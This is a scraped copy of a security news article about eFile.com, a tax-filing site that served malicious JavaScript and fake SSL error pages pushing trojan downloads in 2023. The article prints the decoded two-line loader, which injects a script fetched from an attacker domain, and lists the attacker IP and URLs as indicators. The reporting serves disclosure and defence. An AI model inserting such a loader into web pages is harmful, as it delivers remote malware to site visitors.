# IRS-authorized eFile.com tax return software caught serving JS malware
## eFile.com, an IRS-authorized e-file software service provider used by many for filing their tax returns, has been caught serving JavaScript malware.
## Information:

+ Link: https://www.bleepingcomputer.com/news/security/irs-authorized-efilecom-tax-return-software-caught-serving-js-malware/
+ Source: Bleeping Computer
+ Author: Ax Sharma
+ Date published: 04 April 2023, 09:00
+ Date scraped: 04 April 2023, 10:00

## Article:
![Main article image](https://www.bleepstatic.com/content/hl-images/2020/11/19/taxes.jpg)



eFile.com, an IRS-authorized e-file software service provider used by many for filing their tax returns, has been caught serving JavaScript malware.


Security researchers state the malicious JavaScript file existed on eFile.com website for weeks. BleepingComputer has been able to confirm the existence of the malicious JavaScript file in question, at the time.


Note, this security incident specifically concerns eFile.com and *not* identical sounding domains or [IRS' e-file infrastructure](https://en.wikipedia.org/wiki/IRS_e-file).


## Just in time for tax season


eFile.com was caught serving malware, as spotted by multiple users and researchers. The malicious JavaScript file in question is called 'popper.js':



![eFile.com serving malicious popper.js file](https://www.bleepstatic.com/images/news/u/1164866/2023/Apr/eFile.com-JS/efile-js.jpg)**The 'popper.js' file used by eFile.com across its webpages contains malware**  

​​​(BleepingComputer)


The development comes at a crucial time when U.S. taxpayers are wrapping up their IRS tax returns before the April 18th due date.


The highlighted code above is base64-encoded with its decoded version shown below. The code attempts to load JavaScript returned by*infoamanewonliag[.]online:*


s=document.createElement('script');document.body.appendChild(s);  

s.src='//www.infoamanewonliag[.]online/update/index.php?'+Math.random();
The use of Math.random() at the end is likely to prevent caching and load a fresh copy of the malware—should the threat actor make any changes to it, every time eFile.com is visited. At the time of writing, the endpoint was no longer up.


BleepingComputer can confirm, the malicious JavaScript file 'popper.js' was being loaded by almost every page of eFile.com, at least up until April 1st.



![eFile.com pages serving popper.js](https://www.bleepstatic.com/images/news/u/1164866/2023/Apr/eFile.com-JS/efile-poppers-embedded.jpg)**eFile.com pages serving poppers.js** (BleepingComputer)


As of today, the file is no longer seen serving the malicious code.


## Website 'hijacked' over 2 weeks ago


On March 17th, a Reddit [thread](http://www.reddit.com/r/Scams/comments/11tx8pj/possible_fake_website_network_error/) surfaced where multiple eFile.com users suspected the website was "hijacked."


At the time, the website showed an SSL error message that, some suspected, appeared to be fake:



![SSL error shown by eFile.com](https://www.bleepstatic.com/images/news/u/1164866/2023/Apr/eFile.com-JS/efile-ssl-errors.jpeg)**SSL error shown by eFile.com**(u/SaltyPotter on Reddit)


Turns out that's indeed the case. Researchers spotted an additional file 'update.js' associated with this attack which was being served by an Amazon AWS endpoint.


BleepingComputer has obtained the so-called 'update.js' and we noticed the fake SSL error message present as base64-encoded HTML code (highlighted below) inside of it:



![Fake SSL error message encoded as base64](https://www.bleepstatic.com/images/news/u/1164866/2023/Apr/eFile.com-JS/update-js-fake-ssl-error.jpg)**Fake SSL error message which is just base64-encoded HTML**(BleepingComputer)


An HTML excerpt from the decoded string generating the fake SSL error is shown below:



![HTML code generating the fake SSL error message](https://www.bleepstatic.com/images/news/u/1164866/2023/Apr/eFile.com-JS/ssl-error-html.jpg)**Decoded base64 HTML code generating the fake SSL error message**(BleepingComputer)


The malicious JavaScript file 'update.js', further attempts to prompt users to download next stage payload, depending on whether they are using Chrome [update.exe - [VirusTotal](https://www.virustotal.com/gui/file/882d95bdbca75ab9d13486e477ab76b3978e14d6fca30c11ec368f7e5fa1d0cb)] or Firefox [installer.exe - [VirusTotal](https://www.virustotal.com/gui/file/095fbb7685f5ad054bab28346d744e137564beabc33c13a25818936ddc739f5b)]. Some antivirus products have already began flagging these executables as trojans.


BleepingComputer has independently confirmed these binaries establish a connection to a Tokyo-based IP address, 47.245.6.91, that appears to be hosted with Alibaba. The same IP also hosts the illicit domain, *infoamanewonliag[.]online* associated with this issue.


Security research group named MalwareHunterTeam*,*who further analyzed these binaries, [states](https://twitter.com/malwrhunterteam/status/1643003319248465928) these contain Windows botnets written in PHP—a fact the research group mocked. Additionally, they called out eFile.com for leaving the malicious code on its website for weeks:


"So, the website of [efile.com]... got compromised at least around middle of March & still not cleaned," [writes](https://twitter.com/malwrhunterteam/status/1642988428080865281) MalwareHunterTeam*.*


Referring to a Reddit thread, they further said, "...even the payloads serving domain was mentioned 15 days ago already. How this not got more attention yet?"


Dr. Johannes Ulrich of SANS Institute has also released [an analysis](http://%C2%A0https://isc.sans.edu/diary/Supply+Chain+Compromise+or+False+Positive+The+Intriguing+Case+of+efilecom+updated+confirmed+malicious+code/29708) of the issue.


The full scope of this incident, including if the attack successfully infected any eFile.com visitors and customers, remains yet to be learned.


BleepingComputer has approached eFile.com with questions well before publishing.


In January 2022, the LockBit ransomware gang [claimed it had attacked](https://www.redpacketsecurity.com/lockbit-2-0-ransomware-victim-efile-com/) eFile.com. At the time, BleepingComputer did not receive a response from the company confirming or denying an attack.





## Tags:
***ipv4-adresses***: 47.245.6.91
***urls***: http://infoamanewonliag.online http://www.infoamanewonliag.online/update/index.php?'+Math.random(

### Autogenerated tags:
[[efile.com]] [[bleepingcomputer]] [[javascript]] [[website]] [[ssl]] [[html]] [[malware]] [[base64-encoded]] [[reddit]]
